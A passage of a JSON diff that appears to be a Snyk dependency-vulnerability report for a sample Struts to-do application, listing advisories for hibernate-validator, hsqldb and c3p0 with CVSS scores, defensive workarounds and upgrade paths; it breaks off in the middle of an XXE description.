Commit](https://github.com/hibernate/hibernate-validator/commit/c489416f699a46859c134796b3ccfea41ef3ce52)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/c9525ca544b1281e2b7c7347e86e87c86dc1dc6e)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/e8c42b689df8c6752d635d02c6518da3fece3870)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/f97c2021a03c825abdeca1692f5be51e77e76a8f)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/fd4eaed7fb930db6a5e4c03742b4b3adcfecc90e)\n- [Jira Issue](https://hibernate.atlassian.net/browse/HV-912)\n- [Redhat Bugzilla](https://bugzilla.redhat.com/CVE-2014-3558)\n", + "epssDetails": { + "percentile": "0.70800", + "probability": "0.00319", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2014-3558" + ], + "CWE": [ + "CWE-592" + ] + }, + "packageName": "org.hibernate:hibernate-validator", + "proprietary": false, + "creationTime": "2016-12-25T16:51:53Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2014-07-17T16:51:53Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.hibernate", + "artifactId": "hibernate-validator" + }, + "publicationTime": "2014-07-17T16:51:53Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:45.778673Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-validator@4.3.1.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "org.hibernate:hibernate-validator", + "version": "4.3.1.Final", + "severityWithCritical": "medium" + }, + { + "id": "SNYK-JAVA-ORGHIBERNATE-568162", + "title": "Improper Input Validation", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "credit": [ + "Alvaro Muñoz" + ], + "semver": { + "vulnerable": [ + "[,6.0.19.Final)", + "[6.1.0,6.1.3.Final)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "6.0.19.Final", + "6.1.3.Final" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [ + { + "version": [ + "[,6.0.19.Final)", + "[6.1.0,6.1.3.Final)" + ], + "functionId": { + "filePath": "org/hibernate/validator/internal/engine/ValidatorImpl.java", + "className": "ValidatorImpl", + "functionName": "validate" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.hibernate:hibernate-validator", + "references": [ + { + "url": "https://github.com/hibernate/hibernate-validator/pull/1071", + "title": "GitHub PR" + }, + { + "url": "https://hibernate.atlassian.net/browse/HV-1758", + "title": "Jira Issue" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1805501", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:50:18.797394Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:54:00.490090Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:37.379564Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:18.797394Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:54:00.490090Z" + } + ], + "description": "## Overview\n[org.hibernate:hibernate-validator](https://mvnrepository.com/artifact/org.hibernate/hibernate-validator) is a Hibernate Validator Engine Relocation Artifact.\n\nAffected versions of this package are vulnerable to Improper Input Validation. A bug in the message interpolation processor enables invalid EL expressions to be evaluated as if they were valid. This flaw allows attackers to bypass input sanitation (escaping, stripping) controls that developers may have put in place when handling user-controlled data in error messages.\n## Remediation\nUpgrade `org.hibernate:hibernate-validator` to version 6.0.19.Final, 6.1.3.Final or higher.\n## References\n- [GitHub PR](https://github.com/hibernate/hibernate-validator/pull/1071)\n- [Jira Issue](https://hibernate.atlassian.net/browse/HV-1758)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1805501)\n", + "epssDetails": { + "percentile": "0.49937", + "probability": "0.00139", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-10693" + ], + "CWE": [ + "CWE-20" + ], + "GHSA": [ + "GHSA-rmrm-75hp-phr2" + ] + }, + "packageName": "org.hibernate:hibernate-validator", + "proprietary": false, + "creationTime": "2020-05-05T12:05:58.541980Z", + "functions_new": [ + { + "version": [ + "[,6.0.19.Final)", + "[6.1.0,6.1.3.Final)" + ], + "functionId": { + "className": "org.hibernate.validator.internal.engine.ValidatorImpl", + "functionName": "validate" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-05-05T00:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.hibernate", + "artifactId": "hibernate-validator" + }, + "publicationTime": "2020-05-05T16:32:46Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:54:00.490090Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-validator@4.3.1.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "org.hibernate:hibernate-validator", + "version": "4.3.1.Final", + "severityWithCritical": "medium" + }, + { + "id": "SNYK-JAVA-ORGHIBERNATE-569100", + "title": "Cross-site Scripting (XSS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N/E:U/RL:O/RC:R", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,6.0.18.Final)", + "[6.1.0.Alpha1,6.1.0.Final)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "6.0.18.Final", + "6.1.0.Final" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 6.5, + "functions": [ + { + "version": [ + "[,6.0.18.Final)", + "[6.1.0.Alpha1,6.1.0.Final)" + ], + "functionId": { + "filePath": "org/hibernate/validator/internal/constraintvalidators/hv/SafeHtmlValidator.java", + "className": "SafeHtmlValidator", + "functionName": "getFragmentAsDocument" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.hibernate:hibernate-validator", + "references": [ + { + "url": "https://lists.apache.org/thread.html/r87b7e2d22982b4ca9f88f5f4f22a19b394d2662415b233582ed22ebf@%3Cnotifications.accumulo.apache.org%3E", + "title": "Apache Security Advisory" + }, + { + "url": "https://github.com/hibernate/hibernate-validator/commit/124b7dd6d9a4ad24d4d49f74701f05a13e56ceee", + "title": "GitHub Commit" + }, + { + "url": "https://in.relation.to/2019/11/20/hibernate-validator-610-6018-released/", + "title": "Hibernator Security Release Blog" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-10219", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "cvssV3BaseScore": 6.1, + "modificationTime": "2024-03-11T09:51:34.418099Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", + "cvssV3BaseScore": 6.5, + "modificationTime": "2024-03-11T09:54:00.455389Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N/E:U/RL:O/RC:R", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:01:47.749976Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 6.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:34.418099Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:54:00.455389Z" + } + ], + "description": "## Overview\n[org.hibernate:hibernate-validator](https://mvnrepository.com/artifact/org.hibernate/hibernate-validator) is a Hibernate Validator Engine Relocation Artifact.\n\nAffected versions of this package are vulnerable to Cross-site Scripting (XSS). The `SafeHtml` validator annotation fails to properly sanitize payloads consisting of potentially malicious code in HTML comments and instructions.\n## Details\n\nA cross-site scripting attack occurs when the attacker tricks a legitimate web-based application or site to accept a request as originating from a trusted source.\n\nThis is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.\n\nInjecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.\n\nEscaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, `<` can be coded as `<`; and `>` can be coded as `>`; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses `<` and `>` as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.\n \nThe most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware. \n\n### Types of attacks\nThere are a few methods by which XSS can be manipulated:\n\n|Type|Origin|Description|\n|--|--|--|\n|**Stored**|Server|The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link.|\n|**Reflected**|Server|The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser.| \n|**DOM-based**|Client|The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data.|\n|**Mutated**| |The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters.|\n\n### Affected environments\nThe following environments are susceptible to an XSS attack:\n\n* Web servers\n* Application servers\n* Web application environments\n\n### How to prevent\nThis section describes the top best practices designed to specifically protect your code: \n\n* Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches. \n* Convert special characters such as `?`, `&`, `/`, `<`, `>` and spaces to their respective HTML or URL encoded equivalents. \n* Give users the option to disable client-side scripts.\n* Redirect invalid requests.\n* Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.\n* Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.\n* Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.\n\n## Remediation\nUpgrade `org.hibernate:hibernate-validator` to version 6.0.18.Final, 6.1.0.Final or higher.\n## References\n- [Apache Security Advisory](https://lists.apache.org/thread.html/r87b7e2d22982b4ca9f88f5f4f22a19b394d2662415b233582ed22ebf@%3Cnotifications.accumulo.apache.org%3E)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/124b7dd6d9a4ad24d4d49f74701f05a13e56ceee)\n- [Hibernator Security Release Blog](https://in.relation.to/2019/11/20/hibernate-validator-610-6018-released/)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-10219)\n", + "epssDetails": { + "percentile": "0.61710", + "probability": "0.00232", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-10219" + ], + "CWE": [ + "CWE-79" + ] + }, + "packageName": "org.hibernate:hibernate-validator", + "proprietary": false, + "creationTime": "2020-05-14T16:07:06.897969Z", + "functions_new": [ + { + "version": [ + "[,6.0.18.Final)", + "[6.1.0.Alpha1,6.1.0.Final)" + ], + "functionId": { + "className": "org.hibernate.validator.internal.constraintvalidators.hv.SafeHtmlValidator", + "functionName": "getFragmentAsDocument" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-10-18T14:55:21Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.hibernate", + "artifactId": "hibernate-validator" + }, + "publicationTime": "2020-01-09T14:55:12Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:54:00.455389Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-validator@4.3.1.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "org.hibernate:hibernate-validator", + "version": "4.3.1.Final", + "severityWithCritical": "medium" + }, + { + "id": "SNYK-JAVA-ORGHSQLDB-3040860", + "title": "Remote Code Execution (RCE)", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H", + "credit": [ + "OSS Fuzz Team" + ], + "semver": { + "vulnerable": [ + "[,2.7.1)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.7.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.hsqldb:hsqldb", + "references": [ + { + "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50212%23c7", + "title": "Chromium Bugs" + }, + { + "url": "https://github.com/ryenus/hsqldb/commit/b6719c67b41eb9298c2451ad2829bf03b262a941", + "title": "GitHub Commit" + }, + { + "url": "http://hsqldb.org/doc/2.0/guide/sqlroutines-chapt.html%23src_jrt_access_control", + "title": "Mitigation" + }, + { + "url": "https://sourceforge.net/p/hsqldb/svn/6614/tree//base/trunk/src/org/hsqldb/persist/HsqlDatabaseProperties.java", + "title": "SVN Commit" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:51:53.988304Z" + }, + { + "assigner": "Red Hat", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:53:59.414572Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:05:55.045961Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:53.988304Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:59.414572Z" + } + ], + "description": "## Overview\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE) when using `java.sql.Statement` or `java.sql.PreparedStatement` to process untrusted input. By default, it is allowed to call any static method of any Java class in the classpath resulting in code execution.\n\n## Workaround\nUsers who are unable to upgrade to the fixed version can set the system property `hsqldb.method_class_names` to classes which are allowed to be called. For example, `System.setProperty(\"hsqldb.method_class_names\", \"abc\")` or Java argument `-Dhsqldb.method_class_names=\"abc\"` can be used.\n## Remediation\nUpgrade `org.hsqldb:hsqldb` to version 2.7.1 or higher.\n## References\n- [Chromium Bugs](https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50212#c7)\n- [GitHub Commit](https://github.com/ryenus/hsqldb/commit/b6719c67b41eb9298c2451ad2829bf03b262a941)\n- [Mitigation](http://hsqldb.org/doc/2.0/guide/sqlroutines-chapt.html#src_jrt_access_control)\n- [SVN Commit](https://sourceforge.net/p/hsqldb/svn/6614/tree//base/trunk/src/org/hsqldb/persist/HsqlDatabaseProperties.java)\n", + "epssDetails": { + "percentile": "0.85801", + "probability": "0.01274", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2022-41853" + ], + "CWE": [ + "CWE-94" + ], + "GHSA": [ + "GHSA-77xx-rxvh-q682" + ] + }, + "packageName": "org.hsqldb:hsqldb", + "proprietary": false, + "creationTime": "2022-10-07T07:26:42.276748Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2022-10-06T18:52:05Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.hsqldb", + "artifactId": "hsqldb" + }, + "publicationTime": "2022-10-07T07:26:42.515068Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:59.414572Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hsqldb:hsqldb@2.3.2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "org.hsqldb:hsqldb", + "version": "2.3.2", + "severityWithCritical": "high" + } + ], + "upgrade": { + "org.apache.logging.log4j:log4j-core@2.7": { + "upgradeTo": "org.apache.logging.log4j:log4j-core@2.13.2", + "upgrades": [ + "org.apache.logging.log4j:log4j-core@2.7", + "org.apache.logging.log4j:log4j-core@2.7", + "org.apache.logging.log4j:log4j-core@2.7" + ], + "vulns": [ + "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-567761", + "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2327339", + "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2321524" + ] + }, + "org.apache.struts:struts2-core@2.3.20": { + "upgradeTo": "org.apache.struts:struts2-core@6.1.2", + "upgrades": [ + "commons-fileupload:commons-fileupload@1.3.1", + "commons-io:commons-io@2.2", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts:struts2-core@2.3.20", + "org.freemarker:freemarker@2.3.19", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts:struts2-core@2.3.20", + "commons-fileupload:commons-fileupload@1.3.1", + "commons-fileupload:commons-fileupload@1.3.1", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts.xwork:xwork-core@2.3.20", + "org.apache.struts.xwork:xwork-core@2.3.20", + "org.apache.struts.xwork:xwork-core@2.3.20", + "ognl:ognl@3.0.6", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts.xwork:xwork-core@2.3.20", + "org.apache.struts.xwork:xwork-core@2.3.20", + "org.apache.struts.xwork:xwork-core@2.3.20", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts.xwork:xwork-core@2.3.20", + "org.apache.struts.xwork:xwork-core@2.3.20", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts.xwork:xwork-core@2.3.20", + "org.apache.struts.xwork:xwork-core@2.3.20" + ], + "vulns": [ + "SNYK-JAVA-COMMONSFILEUPLOAD-3326457", + "SNYK-JAVA-COMMONSIO-1277109", + "SNYK-JAVA-ORGAPACHESTRUTS-6100744", + "SNYK-JAVA-ORGAPACHESTRUTS-5707101", + "SNYK-JAVA-ORGAPACHESTRUTS-2635340", + "SNYK-JAVA-ORGFREEMARKER-1076795", + "SNYK-JAVA-ORGAPACHESTRUTS-608098", + "SNYK-JAVA-ORGAPACHESTRUTS-609765", + "SNYK-JAVA-ORGAPACHESTRUTS-32477", + "SNYK-JAVA-ORGAPACHESTRUTS-31495", + "SNYK-JAVA-ORGAPACHESTRUTS-31501", + "SNYK-JAVA-ORGAPACHESTRUTS-31502", + "SNYK-JAVA-ORGAPACHESTRUTS-31500", + "SNYK-JAVA-COMMONSFILEUPLOAD-30082", + "SNYK-JAVA-COMMONSFILEUPLOAD-31540", + "SNYK-JAVA-ORGAPACHESTRUTS-30774", + "SNYK-JAVA-ORGAPACHESTRUTS-30775", + "SNYK-JAVA-ORGAPACHESTRUTS-30776", + "SNYK-JAVA-ORGAPACHESTRUTS-460223", + "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30802", + "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30803", + "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30804", + "SNYK-JAVA-OGNL-30474", + "SNYK-JAVA-ORGAPACHESTRUTS-30773", + "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30799", + "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30800", + "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30801", + "SNYK-JAVA-ORGAPACHESTRUTS-30060", + "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30798", + "SNYK-JAVA-ORGAPACHESTRUTSXWORK-5811864", + "SNYK-JAVA-ORGAPACHESTRUTS-30770", + "SNYK-JAVA-ORGAPACHESTRUTSXWORK-451611", + "SNYK-JAVA-ORGAPACHESTRUTSXWORK-474418" + ] + }, + "org.springframework:spring-web@3.2.6.RELEASE": { + "upgradeTo": "org.springframework:spring-web@5.3.34", + "upgrades": [ + "org.springframework:spring-web@3.2.6.RELEASE", + "org.springframework:spring-web@3.2.6.RELEASE", + "org.springframework:spring-web@3.2.6.RELEASE", + "org.springframework:spring-beans@3.2.6.RELEASE", + "org.springframework:spring-core@3.2.6.RELEASE", + "org.springframework:spring-core@3.2.6.RELEASE", + "org.springframework:spring-expression@3.2.6.RELEASE", + "org.springframework:spring-expression@3.2.6.RELEASE", + "org.springframework:spring-expression@3.2.6.RELEASE", + "org.springframework:spring-context@3.2.6.RELEASE", + "org.springframework:spring-web@3.2.6.RELEASE", + "org.springframework:spring-web@3.2.6.RELEASE", + "org.springframework:spring-web@3.2.6.RELEASE", + "org.springframework:spring-web@3.2.6.RELEASE", + "org.springframework:spring-core@3.2.6.RELEASE", + "org.springframework:spring-web@3.2.6.RELEASE" + ], + "vulns": [ + "SNYK-JAVA-ORGSPRINGFRAMEWORK-6597980", + "SNYK-JAVA-ORGSPRINGFRAMEWORK-6444790", + "SNYK-JAVA-ORGSPRINGFRAMEWORK-6261586", + "SNYK-JAVA-ORGSPRINGFRAMEWORK-2823313", + "SNYK-JAVA-ORGSPRINGFRAMEWORK-2330878", + "SNYK-JAVA-ORGSPRINGFRAMEWORK-2329097", + "SNYK-JAVA-ORGSPRINGFRAMEWORK-2434828", + "SNYK-JAVA-ORGSPRINGFRAMEWORK-3369749", + "SNYK-JAVA-ORGSPRINGFRAMEWORK-5422217", + "SNYK-JAVA-ORGSPRINGFRAMEWORK-2689634", + "SNYK-JAVA-ORGSPRINGFRAMEWORK-1009832", + "SNYK-JAVA-ORGSPRINGFRAMEWORK-30165", + "SNYK-JAVA-ORGSPRINGFRAMEWORK-30164", + "SNYK-JAVA-ORGSPRINGFRAMEWORK-30163", + "SNYK-JAVA-ORGSPRINGFRAMEWORK-31325", + "SNYK-JAVA-ORGSPRINGFRAMEWORK-31331" + ] + }, + "org.zeroturnaround:zt-zip@1.12": { + "upgradeTo": "org.zeroturnaround:zt-zip@1.13", + "upgrades": [ + "org.zeroturnaround:zt-zip@1.12" + ], + "vulns": [ + "SNYK-JAVA-ORGZEROTURNAROUND-31681" + ] + } + }, + "patch": {}, + "ignore": {}, + "pin": {} + }, + "filesystemPolicy": false, + "filtered": { + "ignore": [ + { + "id": "SNYK-JAVA-C3P0-461017", + "title": "XML External Entity (XXE) Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[0,]" + ] + }, + "exploit": "Not Defined", + "fixedIn": [], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9.8, + "functions": [ + { + "version": [ + "[0.9.1,]" + ], + "functionId": { + "filePath": "com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java", + "className": "C3P0ConfigXmlUtils", + "functionName": "extractXmlConfigFromInputStream" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "c3p0:c3p0", + "references": [ + { + "url": "https://github.com/swaldman/c3p0/commit/7dfdda63f42759a5ec9b63d725b7412f74adb3e1", + "title": "GitHub Commit" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:48:06.803024Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:48:09.230623Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:01:45.369849Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:06.803024Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:09.230623Z" + } + ], + "description": "## Overview\n\n[c3p0:c3p0](https://mvnrepository.com/artifact/c3p0/c3p0) is a lIbrary for augmenting traditional (DriverManager-based) JDBC drivers with JNDI-bindable DataSources, including DataSources that implement Connection and Statement Pooling, as described by the jdbc3 spec and jdbc2 std extension. Note: This library is no longer maintained and has migrated to the artifact \r\n\"com.mchange:c3p0\"\n\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection.\nvia the `extractXmlConfigFromInputStream` in `com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java` during initialization.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\r\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\r\n\r\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\r\n\r\nFor example, below is a sample XML document, containing an XML element- 